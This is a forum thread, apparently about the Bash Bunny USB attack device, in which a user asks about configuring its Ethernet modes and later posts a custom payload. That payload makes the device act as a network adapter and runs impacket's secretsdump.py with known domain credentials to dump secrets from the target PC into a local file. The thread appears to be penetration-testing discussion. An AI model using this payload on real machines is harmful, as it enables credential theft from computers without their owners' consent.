Jump to content

[Attackmode Feature Request] Ethernet adapter


Altecheon
 Share

Recommended Posts

I understand that part of the plan for the BB was Man in the Middle attacks, which is why I am running into an issue with one of the payloads I am playing around with. In an enterprise environment the system, unless its a laptop, may not cache credentials that you may have obtained. This being said if the user is not currently logged into the machine or has not logged in for a while, the system will attempt to reach out to a log in server. If the BB is the route the system takes to reach the internet, then the computer will throw an error like this 

Quote

"SMB SessionError: STATUS_NO_LOGON_SERVERS(No logon servers are currently available to service the logon request.)"

All of that being said, i think a feature that may be helpful would be to allow for configuration of the Ethernet modes. This would allow you to set the connection to slower than most networks or maybe having no connection to the internet. This would also help when you do not wish to interrupt internet connectivity for the device. 

I cannot say that you cannot configure this already, but I can say I do not know how to configure this and that I am curious as to how I would do this.

Link to comment
Share on other sites

As far as I understand at the moment, when the BB is plugged into a host machine, and is acting as an ethernet adapter (RNDIS_ETHERNET, ECM_ETHERNET), it generally registers as the fastest (2GBps) and defaults to the primary interface. That being said, when the BB is the primary interface, it does not have internet access, nor does the host machine utilizing it.

What payload are you working with that is having issues? Is it a custom payload? Can you share it?

Link to comment
Share on other sites

It is a custom payload using impacket at the old firmware location. It assumes that you know the domain/user and password to pull credentials from a PC. If the account is cached, it executes, but if not it fails due to contacting the login server. I have also figured out that the use of an @ or a colon in a password causes issues for the impacket code.

 

Quote

USER=domain/Genericuser
PASS=GenericPassword

LED R SLOW
ATTACKMODE RNDIS_ETHERNET
GET TARGET_HOSTNAME
GET TARGET_IP

#if target does not get an IP give fail LED
if [ -z "${TARGET_IP}" ]; then
    LED R 100
    exit 1
fi


cd /pentest/impacket/examples 

if [ ! -d "temp" ]; then
    mkdir temp
fi

python secretsdump.py $USER:$PASS@$TARGET_IP -outputfile temp/$TARGET_HOSTNAME > temp/$temp/$TARGET_HOSTNAME.outputfile
sync
LED G SLOW

 

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...